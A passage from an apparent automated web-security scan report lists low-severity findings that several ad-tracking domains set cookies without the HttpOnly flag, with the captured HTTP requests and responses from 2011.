Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 23-Jun-2013 17:04:27 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.57. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=D_F1HyIlEt90XWOwBLOFNrAiPk8Ac4qydps8iNraMEKDvodA_sbW8c2JnlV_mybf1n-tmlhhoYFMuRzx0bELYA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS009W1ujEvgdnOfJu5crBfoqKPISxg4JMc-wfusvOiL66IfoxhRVau6TltYBb7-XChmyRJwYT3SVN8WLd39hZk8Bc5k_8SzK7X_3Bu_DkXEJ1-0bPVbCw9gJGr_B8xDvqoSRWiJ0aXKJcZ-Rm_1IemcOgPxlg_I4GVGQsts3-Widpm2owGjEbtSLL0XOjeWJwuRIJkkBAqJsNNITsh4NZ79vNPuYVunznl4Ru-AlUbhO4WJot6ZQLYMWYK-3VIhf9NOVCTi9EKN0EChMCpt8t79taa2O8z0zAFVDyg3ety8a8X24jJ6sSBHRnGvcfC46N5cRIRjWMuveNQmJnehLSzrzO4mWkXY8sRfEZSRVF-eLcIql8-Bktoud7UrXynkSAhN6akQLaY-eXSAvrbezbiKSwrMJsaQSeTsKGuCQQr2-y5a7Qi8VwRgyzaNjUJGKJsi6dxv2oUpLC8kr0lnKkHXcJR_rGcvm6DgXUkti2dAj3C6gNLghcL1ATT4dfXoT0XCq9YPC5oENmg6G4qCLpkd6bOL8K_8x_ofi-YZIXtSwkZ2h2FTEOB7VAVaX5hOrFfnL1gLyqIqik_zuH70qAJA-PBhbA79851KT4-AG0SCN_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxoPPk2bpwxxJLKaR6-s3EU26XW92a-msXAhMgRGpU1p6Juquy9ZrCLMz-gm43o_H-Bl7sbzW9GEZ0ngzf92snAnRcT637PYoh9vs8nxEshXyZrKeJEXnSgmaEwKGT0NYjHqeyWBScug8JR8Ogml2rS_8VpwQL7zeGBwWLOtt2X6e5mIpzfBfsaJojQQA8aQFUV499JD3JawQFF-O5bgAetRXnIhw7Q1GQOqAwPZYBAlsXj29aoCtsMnTKiqJ-4FPyvAt7MYGai56hsHZYw1pPFfubGkytCfTIRLVtkmYuONkgCSYgnFnvF5gKPmXiBQ9dWg5UVe5zOlev8xSqT-8JS2EDyiLHISVTcA2XV0Papii_0G4vyX4BB1uK3mZKqFwCB7V_2_YMp2tLu2luQQzSKrFobpGzDPG60qE7Z1BueqeWLTn54P86vtZCdL4Et0GphOd6rTMoWpTj1U1wX22aW3FPU1oQkWEyK98ozmItdcuoDcloFWpq5ZHCojxL_cWf4EwTRa2OYv6xN_c1_3djCz_W53uzQhFTz7d2IZbRiKFFqlaE1XAnxcOp4xiYuYfIzeYiTtzrVIHv7wUzHKILRxITElIfz1Os_Qq07M4F9O_CBoBBTZPqpiN6lRHoduZTv7rwXS_mtQPlV9OlcM3SofjeVvDb839deLUAObQ8GB-e8PtB-b2vXw1XxBOXggLkQ33Mxxv0oPw2IFtoFLcC4UWvoXMOCBLu4d31iv78LZ7orMqeG9dIdYhrW8gVTGc8vc44PtS2IyZUysSPh_4uJu; rrs=1%7C6%7C3%7C12%7C1002%7C18%7C7%7C1%7C9%7C7%7C10%7C13%7C1003%7C1006%7C2%7C12%7C1001%7C1004%7C1008; rds=15146%7C15146%7C15149%7C15146%7C15146%7C15146%7C15149%7C15146%7C15149%7C15146%7C15146%7C15146%7C15146%7C15145%7C15146%7C15149%7C15146%7C15146%7C15149; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Wed, 21-Dec-2011 13:30:17 GMT; Path=/
Set-Cookie: pf=4blGArXvJ-PddxqdRqDw-ck00Y-5dC0-iyRiWrfLpMpMt2vNseyxoxgBojoGxwQVDRpjlVghUYhhYY80pAjmdwAhauvj1Lu_lr7-HGGkwhihCMr7KpHSbd6P95bWy9TBSXZVEiWgOeyNu1wX145Ub2PtoOXdVipFu3konRUOQage29aWjdMy7xXpqeQEJwATsyBZPqWLea4FSifO2l7YD2_pmn2ief-Xc-RWBdoHTt_kYU51MhZbU0IzUXKlO5v-Q7HYNgVTqKrGTkv5pCXX7m5O8A7FIHibGj5DpgyEHdU83j686lW_-cjpN1DdudTNYPytEqkZDnNQchjDMfNHpBES0jZY1ncB2jHnT2acYsFWMZ68HKo4c6yMqaVds04NvpjcfQIWVcOJv8gtgMUPXkfA6lLq_MpEEFfoFqFypmh46XJAwA2xbokXnMqZgYz9oJ1v_xduPBT_Xi0l9WN5Jg4rLq9q5JywkdDiwtgJHN3sYD5ckkAyyydP500XnoSzcY_QS925sh7URWgzYJaPWg-XVk0omn8onW1tDUPyMmOnFJRjBcEMxdDM5u496FsXruYQ9_ZvviEZsCTu2ab_RNu_WttD4IxsG8NecGv8aJTY1L78PWFOJccLF_SVl-p7FqQnhT285qwaHzvHjlPfy5I_P3AvoMVPhtuF37hBQY9Z5NuybpTlGcHJmRklWRV_RA8MPMKSNoh6_oE1E53WJth3jioE5hIe8CK-74c3KzqcXkoT28HeuPYoeuwow28dQIx9lMwF6iB6TuIghnXGH0QyYLOAcFPLNX3yLrH6qoL52EgbwYTJxXhwRmwhEuik_sCgzFxd080EezJvIeKOWW2prAcquUwIXvaegi9WV8PiAEb7iN9OfiWBLdBajZGUGyi7s-IM7tx9zrJ_hkKK1gadqXz1AEQ9Kh52rfmyu7XhO9AyBc5HS_FKvBNrzvX1NnUpWKiWImPUDgT77rslwLSl3XBKHJ4MTpA8HPgIw8QqSx_0qNfccCQRX4aVOVnk2zHcY1otOzk0ZTEP0SAsuQdXFxI1T1zz3y2Mk7UgxZ7d1OQKF8oiGWvOBQpx_trx1Q-qnfDRHOB5Dpn3FpDZ1ATXgvFUnbGEt4rF3gGNwTus7knJ3b7qW2W47yewVm2xthRmXWvZdI5BQq_u0Mu-9lS-iEfiLjKWR2gTCNOuFmRNawvtYkPq3yNwCWFmbofohvrSPFipFWgtdp-sKG43Pxq2SCYMvAhS8VONQS_wWh3WtxqG_jGgmJOSGSmwZeD9IUpycvqjgh8vFGYR-tHS5WHiTWsjjEdZ0PsmXSGODwNFZ5Axaz5tNa2bDpmBguwtkD68TainBEuq_2B76yZq17sU1RWr6LeIDLe6XbciblblKH4BO-voR0DwnN7FUI71wIdJBdr1gcQsTxZaSSuzrWfkqSBnDlamLtugmmmWGmN9fvYxI6Kf-sBJovwlenfNE1SOOrTttuH45en0-nRGJ--sT6bWiS8gm6DpJjDuLkB3xT7gKHPDpHrzZmQjRSeJLUoq7bVfWw7887f7PSc0EXp4tqaPid7brnZ3_Qlb0x8D-qV7cmbSJUw4vl78PuwZgV5UaY1Mg4PRmqo0jXWuxuBRQuIoiJaMR7esJH3so2xTCd6DrRQyLBqi9SrJeRUm0P7mHGN4gKA5ZSY5S24OwLo5XsFh4zQON6fKaQNhIBVSL9melLCMkV1sGktFoVRpUBVvRd9sg6OGDtvjbhzToemwg7qJElmbkTUWm4W4DiBHt6HmYWtkWMqoogUlsIHhBjT9Y34uPWhGg7YZwYHhrk5GywW-w_OVn61B7hccjD9LAPfDsilRftZ4CEB2RG6kDEYxy9VS1yrAwSw4D4cCMFhnqRd0VA9EK_YxqXJ6fUYShUKOhiF4_GtUxk_zWQ83Uc9DG2hdaZ8OsvaEJikZ1qdZfuQRBbuzjV6FEl7lWSeQ_XowopSDQO-H0Vm4jqTYEuLDHRE-prgFjq804zQljfr9BPIJjZ9larmhk-uJ-CEs8HA7pYeFZxJRXPLyyRSFLqmnnGHSTEE_efH0NsFNWKoE0xfumlZP1DEKOH5QAgRMuGrwox2mlV5LY1fpJd4pNoocNDYL294DDuF0PKLSIfw8mSPsJUyvgOVRO4tRGvrCSc1K-7cIbfWYzbcrYTKelWqHdqPXBTbUIJMRAJKgWOP1eU8fs1jrt7JeZx7JBF5CI4FvsPWJ_m93kmj_0TeFS_NKAGMIzM6Tmy5vbQPkHy4IY3IOKhe4xuVgosRXGdJM3dyn5SOOSh4G1yR8rywzDN820znf6vUURKiSxwBpO0UVJcOZjloJVfqLd7WmnpMikHqAi_a6ftyrjuLbnTxQtjlH46o2_tehmyeN54wq65fV-LO3lhsx7-dzn1TVBpsT7kn20JC2lQ9z30OTI1VzqSfqtyod-5mE-mmWkpMIbtJkFiLkTXuULzcQ-zyf5MSu1BLCWokej8nUlwEEFhHehMjw1VLCHvQ5FbATIYHl0FGFmgNWrJNqNKE6uJ1HQAlri8233ZTFeyIevlP8rUg2J-k018eXPG-oSjdEUxgUBCoN_CYJ5cWvhue28Uim-YEmsZ4GM61S-uvuM9Gqeq1y27ELHmmW7ugKnZTLD4dxBSvDjgE-aJiaNemr0W3NjeZ7MObBkWFmACgRkJj5yHRq3cQpVv0Bm0Qzj9oORn-k-l8RlvGGbEzTpcvvrS4lCaFgQO2QpPVzOyrArI2RbHkmiOo_Wofu218GLAsIrWycSiaNPE_tTYxeKQJTDU4G8H-4tfqKGsAiPqXbDomRAJrzocrDr05sMo_ye6gs65dbVQwsMQ83v_73YhGzM8J4T3gAtDeJpW8hCJaDosKSPe5DFMwTy6xu1JFnhcNdqz2nsMvzRaFzoKYp1xWGKvFi4lY7gzmJvyYHoGkQ6nl9UxRQDb0jTbcyNtlpJ-Ebhp6ZOnBrsDeqj4aYnHJcpbBJXCWUMasfcXfi6mQU4pPrNeqfqTGTpTDqBiE6IppnBuUOXNrfB81XiDTIz8jOe26rOPXeY20Ikdy11L87Wc-LxuEo-KZ1KPbsIhwZtM_J36RqAtDmcgxO9XHcLGkN-20Rcup01wqoknGjE-Unqu6nceX2EKhJ1JuW4AqxoJZ5NXCPZ9RJmkqdnqryYifTeb5Q75Q; Domain=.turn.com; Expires=Wed, 21-Dec-2011 13:30:17 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1099311&t=2
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:16 GMT

13.58. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; GUID=MTMwODcwNjA4MDsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=ON0AOFJwFob0FE8sIOwJoaAptKvBC0nR1JpwGg02FatBdbdhWbwihXo1GwjmGatBA9qhWbAZhXo1GskmGatB6ijhWbAmhXo1GAY4FatBdDmhWbA/yao1GAVZGatBYimhWbA3Wao1GUY4FatBEHohWbQVrZo1GEcgGatB25lhWbglBao1G0soGatBecphWbgCaao1GUEoGatBVGohWbAvZao1RGAZmjoRw2I9IsfzFA3shdwjkaAdumPAEOphYbLuAoKuGDxsmBwokaI2zCFALRqhY/KECcHiG0pquJQalZsBk6hB1WjxGC7gGw8jGg4tSbAr8aEi0mvBz8qRJypkCgDiGKqAfarhiC; F1=B40QD4EBAAAABAAAAEAAgEA; BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHRGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; ROLL=U6APDjeaptEWZ9P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.783617.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 24 Jun 2011 13:26:46 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Fri, 24 Jun 2011 13:26:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=WCJBOFJwFob0Fo3sIOwJoaQXtKvBC0nRuIpwGg02F+oBdbdhPawihX4jGwjmG+oBA9qhPaAZhX4jGskmG+oB6ijhPaAmhX4jGAY4F+oBdDmhPaA/ya4jGAVZG+oBYimhPaA3Wa4jGUY4F+oBEHohPaQVrZ4jGEcgG+oB25lhPaglBa4jG0soG+oBecphPagCaa4jGUEoG+oBVGohPaAvZa4jRGAZmjoRp1I9IsfzFA3shdwjkaQLumPAEOphROrZAMKpGG5sQBwSkaYkvChA3hoBWpqbBkWZG/LpeYQt1Y8PwOoBM/oBBdr0GwKvGFEt5bwMvakQcKpA4gohbJwn2a4W; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: F1=BYJkE4kAAAAABU/CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHpGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEWS0P!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: 93673890=_4e049096,1512334550,783617^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000783617/mnum=0000956
...[SNIP]...
13.59. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=12577&partnerID=169&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
